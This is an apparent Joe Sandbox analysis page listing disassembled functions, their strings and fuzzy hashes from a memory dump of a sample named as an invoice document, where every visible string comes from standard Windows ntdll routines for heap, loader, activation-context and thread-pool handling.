                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                                                                                                • API String ID: 0-4009184096
                                                                                                                                • Opcode ID: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                                • Instruction ID: 209e66f29b2a47a94a3d12adfaa8a4192a0fb3e74b26f569f4ab25df939ec84b
                                                                                                                                • Opcode Fuzzy Hash: 49571885eec130a00ad376f819570a319c205faa7b74f2ace7aba778167f403b
                                                                                                                                • Instruction Fuzzy Hash: 4E025FF1D042299BDF21DB54CC84B9AF7B8AB54714F0041EAE619A7243EB309F84CF99
                                                                                                                                Function 017A8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                • API String ID: 0-2515994595
                                                                                                                                • Opcode ID: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                                • Instruction ID: fc54804f5ac63a9fad4e4ae3019f31109fe5bab0d9014b257b2650179d306853
                                                                                                                                • Opcode Fuzzy Hash: c7f06f528127b01df916302cb5b1d64afe2d02d72a471deb46c94b9cc49718bf
                                                                                                                                • Instruction Fuzzy Hash: F251C0715043119BC329DF288848BABFBE8EFD8255F944A6DE999C3241E770D644CBD3
                                                                                                                                Function 017B0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                                                                                • API String ID: 0-1700792311
                                                                                                                                • Opcode ID: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                                • Instruction ID: 7e04ff430cef11b732bb2b15b4958960228f05f1bc2bd387d5d7b254a834aaf2
                                                                                                                                • Opcode Fuzzy Hash: e15ec20bfd35f2920d3650d6a70c8d0f32b10ab5646873f84571b37331e155dc
                                                                                                                                • Instruction Fuzzy Hash: 23D1B9315002869FDB26DF68C884BEAFBF2FF4A714F18805DF5469B652C7349981CB14
                                                                                                                                Function 017889B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01788A3D
                                                                                                                                • VerifierDebug, xrefs: 01788CA5
                                                                                                                                • HandleTraces, xrefs: 01788C8F
                                                                                                                                • AVRF: -*- final list of providers -*- , xrefs: 01788B8F
                                                                                                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01788A67
                                                                                                                                • VerifierDlls, xrefs: 01788CBD
                                                                                                                                • VerifierFlags, xrefs: 01788C50
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                • API String ID: 0-3223716464
                                                                                                                                • Opcode ID: 48c5e674c90f98f3171eb2433c3b99133328931f59db85be37ebe959c8453582
                                                                                                                                • Instruction ID: cb3dab52c9f20cdacb0db1ddd68e11680c3189a800acc9789b8b49869e5febf7
                                                                                                                                • Opcode Fuzzy Hash: 48c5e674c90f98f3171eb2433c3b99133328931f59db85be37ebe959c8453582
                                                                                                                                • Instruction Fuzzy Hash: EE9136B16897129FD321FF28C884F1BFBE4AB94724F85455CFA41AB285C7709D01C796
                                                                                                                                Function 0170EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                                                                                                • API String ID: 0-1109411897
                                                                                                                                • Opcode ID: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                                • Instruction ID: 54113bae73ddb294263b99d80244042e8f0598cbe194577464e900e6c313697e
                                                                                                                                • Opcode Fuzzy Hash: 407535bfead1f840bb063eee2a3f2ae19900fc49772ffe0ce667709b860a9686
                                                                                                                                • Instruction Fuzzy Hash: FFA22774A0562ACFDB75DF19CD887A9FBB5AF49304F1442E9D90AA7290DB309E85CF00
                                                                                                                                Function 017363FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-792281065
                                                                                                                                • Opcode ID: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                                • Instruction ID: 736b083a5ce269a9998410f8a5347a01e2d37441841b1695b784351fed6cd8a5
                                                                                                                                • Opcode Fuzzy Hash: f6ee2a1d4a42d03a2fcf369b424b615f164fbc2eed7de47ad9de400e7343095a
                                                                                                                                • Instruction Fuzzy Hash: 19914A70F41315ABDF35EF58DC88BAAFBA1BB40724F10416CF9126B286D7709A41C791
                                                                                                                                Function 016F645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Loading the shim user DLL failed with status 0x%08lx, xrefs: 01759A2A
                                                                                                                                • Getting the shim user exports failed with status 0x%08lx, xrefs: 01759A01
                                                                                                                                • apphelp.dll, xrefs: 016F6496
                                                                                                                                • LdrpInitShimEngine, xrefs: 017599F4, 01759A07, 01759A30
                                                                                                                                • Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 017599ED
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01759A11, 01759A3A
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-204845295
                                                                                                                                • Opcode ID: 5ab60a2323babbb42192330ef544cb204ade012eb64878e00a2534a94358b6e1
                                                                                                                                • Instruction ID: 6ac2428d054769c7e05b1aa004293e299b1acab030aaf61c5ba5cb9ed4d9a22b
                                                                                                                                • Opcode Fuzzy Hash: 5ab60a2323babbb42192330ef544cb204ade012eb64878e00a2534a94358b6e1
                                                                                                                                • Instruction Fuzzy Hash: 0351C371248305DFE724DF24CC95BABB7E9FB84658F00491DFA869B154DB70EA04CBA2
                                                                                                                                Function 01732674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 017721BF
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01772178
                                                                                                                                • RtlGetAssemblyStorageRoot, xrefs: 01772160, 0177219A, 017721BA
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 01772165
                                                                                                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01772180
                                                                                                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0177219F
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                • API String ID: 0-861424205
                                                                                                                                • Opcode ID: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                                • Instruction ID: b72f5d8edd7a7f7e3e7b27ebfd643e21012ce80daeef5096d14d9ec7115d4e9b
                                                                                                                                • Opcode Fuzzy Hash: 8a4203400e78c74c71da4ef0fabbaca2ff8da2fdf748a9d28f403b1eaafaa38d
                                                                                                                                • Instruction Fuzzy Hash: 34313736F4121577EB229A999C45F5BFBB8FBA5A90F0501A9FB0567243D2709E00C3E0
                                                                                                                                Function 0173C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpInitializeProcess, xrefs: 0173C6C4
                                                                                                                                • LdrpInitializeImportRedirection, xrefs: 01778177, 017781EB
                                                                                                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01778181, 017781F5
                                                                                                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 017781E5
                                                                                                                                • Loading import redirection DLL: '%wZ', xrefs: 01778170
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0173C6C3
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                • API String ID: 0-475462383
                                                                                                                                • Opcode ID: 0d13f238325bac7dba3b13bbe12bc54cb695f9ee0b615657eb7628d81fd1976d
                                                                                                                                • Instruction ID: d34d51b1804a8d7d818d09b70db97988a31b7bebf4e1f2aa3d453d5b709494bd
                                                                                                                                • Opcode Fuzzy Hash: 0d13f238325bac7dba3b13bbe12bc54cb695f9ee0b615657eb7628d81fd1976d
                                                                                                                                • Instruction Fuzzy Hash: 4731E4726443469BC324EB28DC4DE2BF7E4EF94B24F05055CF945AB395DA20ED05C7A2
                                                                                                                                Function 0174096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 01742DF0: LdrInitializeThunk.NTDLL ref: 01742DFA
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BA3
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740BB6
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D60
                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01740D74
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1404860816-0
                                                                                                                                • Opcode ID: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
                                                                                                                                • Instruction ID: 92f90164c844c62b1840711b8f71fc93d0f70a1d7fc1bd192ee9215195e466b9
                                                                                                                                • Opcode Fuzzy Hash: 5307686c404a30be05d50d1c936f06ef97955f2cb4a0698137fdf4b3bfa2a60e
                                                                                                                                • Instruction Fuzzy Hash: 7F425A71900715DFDB21CF28C884BEAB7F5BF48314F1445A9EA89EB245E770AA84CF61
                                                                                                                                Function 0170A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                • API String ID: 0-379654539
                                                                                                                                • Opcode ID: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
                                                                                                                                • Instruction ID: 6b5fab2b05822e66bc1593e080ac49b4c5c06391cdab119b52a5d74b908c21b5
                                                                                                                                • Opcode Fuzzy Hash: 120a50b9a32dfd26fa3a158482183f6860982e993acb28e927f0ada19649ee4a
                                                                                                                                • Instruction Fuzzy Hash: 7CC17A74108382CFD712CF68C444B6AF7E4FF94704F0489AAF9968B296E735CA49CB52
                                                                                                                                Function 01738402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0173855E
                                                                                                                                • @, xrefs: 01738591
                                                                                                                                • LdrpInitializeProcess, xrefs: 01738422
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 01738421
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-1918872054
                                                                                                                                • Opcode ID: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
                                                                                                                                • Instruction ID: 2c02da9cc79767f5c5097165c3a35a72ed50912344d0495560c96f4a54772ddc
                                                                                                                                • Opcode Fuzzy Hash: f866d75f6c3d371606593d3c0ff3a879b99b1d1fa19b36345a053e89a3265c53
                                                                                                                                • Instruction Fuzzy Hash: 09918A71548345AFDB22DF65CC44FABFBE8BB88654F400A2EFA8496146E334D904CB63
                                                                                                                                Function 0173273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • .Local, xrefs: 017328D8
                                                                                                                                • SXS: %s() passed the empty activation context, xrefs: 017721DE
                                                                                                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 017722B6
                                                                                                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 017721D9, 017722B1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                • API String ID: 0-1239276146
                                                                                                                                • Opcode ID: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
                                                                                                                                • Instruction ID: 6d92cf1c06219d69ddeb507bc62e3a9a9fdb3f0e1a32fd5fcbd1f5812668fb04
                                                                                                                                • Opcode Fuzzy Hash: 8a36f8bbe93cc6bbe5bbca031ca7ae6ac4b2bf923b5fd00bc6426a06bca13a70
                                                                                                                                • Instruction Fuzzy Hash: 75A1BD31A05229DBDB24CF68CC88BA9F7B0BF98314F1541E9D918AB252D7309E80CF90
                                                                                                                                Function 01734AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01773437
                                                                                                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0177342A
                                                                                                                                • RtlDeactivateActivationContext, xrefs: 01773425, 01773432, 01773451
                                                                                                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01773456
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                • API String ID: 0-1245972979
                                                                                                                                • Opcode ID: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
                                                                                                                                • Instruction ID: fad418318665089b0e383073739837fba6b58751ccf00b601d2caecd4ee660db
                                                                                                                                • Opcode Fuzzy Hash: a6dfed9cbc394b856c5915c2ec9b1b2a276a0f962c794ff060381ae292f55e30
                                                                                                                                • Instruction Fuzzy Hash: D76123766407129BDB2ACF1DC845B3AF7E1FF80B60F14856DE9569B282DB30E801CB95
                                                                                                                                Function 017064AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01761028
                                                                                                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01760FE5
                                                                                                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 017610AE
                                                                                                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0176106B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                                                                • API String ID: 0-1468400865
                                                                                                                                • Opcode ID: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
                                                                                                                                • Instruction ID: 6968669dacd9d60fa361340d90a666c3680b1b7529734d37f0a93f55aac33b42
                                                                                                                                • Opcode Fuzzy Hash: f7c3bf0933a1772235ef549b832d859467322709ae75b73695e138704b32707f
                                                                                                                                • Instruction Fuzzy Hash: 6971C0B19043459FCB22DF14C888B9BBFE8AF54764F500468FD498B28AD375D588CBD2
                                                                                                                                Function 0172245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • LdrpDynamicShimModule, xrefs: 0176A998
                                                                                                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0176A992
                                                                                                                                • apphelp.dll, xrefs: 01722462
                                                                                                                                • minkernel\ntdll\ldrinit.c, xrefs: 0176A9A2
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                • API String ID: 0-176724104
                                                                                                                                • Opcode ID: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
                                                                                                                                • Instruction ID: b4e4a11fbc125b6cfd04a41dd5bea63d72fa0e0e5cc8e7937ab9bc6e198517d2
                                                                                                                                • Opcode Fuzzy Hash: 66e371b73349121e02148b39c992a828c0272d68a5a72f2ac7419fd95d0e2740
                                                                                                                                • Instruction Fuzzy Hash: B4310575640301ABDB319F5DD885A6BF7B9FB84B20F25405EF91177249CB709982CB90
                                                                                                                                Function 017129A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0171327D
                                                                                                                                • HEAP[%wZ]: , xrefs: 01713255
                                                                                                                                • HEAP: , xrefs: 01713264
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                                                                                                • API String ID: 0-617086771
                                                                                                                                • Opcode ID: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
                                                                                                                                • Instruction ID: 6d15e9f23fcc7b985024aaa513b4c227498258b84d4e6e7ae930f0453a6790f4
                                                                                                                                • Opcode Fuzzy Hash: c9a9fb3a9fa45e1c13dfcd13244e4e154aa5e753562436c331bff6015dd6ef9f
                                                                                                                                • Instruction Fuzzy Hash: E892BB71A042499FDB25CF6CC444BAEFBF1FF48310F288499E859AB39AD334A945CB50
                                                                                                                                Function 01710770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                • API String ID: 0-4253913091
                                                                                                                                • Opcode ID: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
                                                                                                                                • Instruction ID: b50fad2288d3af9a540c298a0212bf1f4102bbdf4e293c32a01ac97355dab7d4
                                                                                                                                • Opcode Fuzzy Hash: 977ddf29e7b6bd16ce7b0394decb55462b632cf73f4ed25f2b21f76499286c7f
                                                                                                                                • Instruction Fuzzy Hash: 9AF19B70604606DFEB25CF6CC894B6AF7B6FF44704F1481A9E9169B389D734EA81CB90
                                                                                                                                Function 01726962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 0000000B.00000002.2300679134.00000000016D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016D0000, based on PE: true
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_11_2_16d0000_z1SupplyInvoiceCM60916_Doc.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $@
                                                                                                                                • API String ID: 0-1077428164
                                                                                                                                • Opcode ID: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
                                                                                                                                • Instruction ID: 18224537fed7c46732b82fd76809850e9442ee00d9b23d783f49fb08d1611212
                                                                                                                                • Opcode Fuzzy Hash: c1f4cbb4e4d195c2c1b394243ab905043df893906e2c3970be7f7a8c59409cc5
                                                                                                                                • Instruction Fuzzy Hash: 1DC29E716083519FDB2ACF28C981BABFBE5AF98714F04892DF9C987241D734D846CB52
                                                                                                                                Function 016FA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
